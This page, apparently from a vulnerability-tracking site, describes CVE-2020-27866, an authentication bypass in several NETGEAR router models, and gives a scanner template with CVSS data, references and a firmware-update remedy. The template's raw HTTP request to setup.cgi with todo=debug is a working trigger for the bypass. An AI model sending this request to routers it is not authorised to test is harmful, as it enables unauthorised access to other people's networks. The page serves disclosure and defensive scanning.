CVE-2020-27866: NETGEAR - Authentication Bypass

2025-08-01 NETGEAR PoC Public

Description

NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers are vulnerable to authentication bypass vulnerabilities which could allow network-adjacent attackers to bypass authentication on affected installations.

PoC

id: CVE-2020-27866

info:
  name: NETGEAR - Authentication Bypass
  author: gy741
  severity: high
  description: NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers are vulnerable to authentication bypass vulnerabilities which could allow network-adjacent attackers to bypass authentication on affected installations.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to the router's settings, allowing an attacker to modify network configurations, intercept traffic, or launch further attacks.
  remediation: |
    Apply the latest firmware update provided by NETGEAR to fix the authentication bypass vulnerability.
  reference:
    - https://wzt.ac.cn/2021/01/13/AC2400_vuln/
    - https://www.zerodayinitiative.com/advisories/ZDI-20-1451/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866
    - https://kb.netgear.com/000062641/Security-Advisory-for-Password-Recovery-Vulnerabilities-on-Some-Routers
    - https://nvd.nist.gov/vuln/detail/CVE-2020-27866
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2020-27866
    cwe-id: CWE-288,CWE-287
    epss-score: 0.08656
    epss-percentile: 0.94836
    cpe: cpe:2.3:o:netgear:ac2100_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: netgear
    product: ac2100_firmware
  tags: cve,cve2020,netgear,auth-bypass,vuln,vkev

http:
  - raw:
      - |
        GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept: */*
        Accept-Language: en
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Debug Enable!'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b32007499da0a6ba94992a660397bcb9da03682a38eb38d9a428358c680b74ac02201538a4c2c9710382bf6d0d38cd4b55a0bb5f26c72f57754ce43cd52ee052745a:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities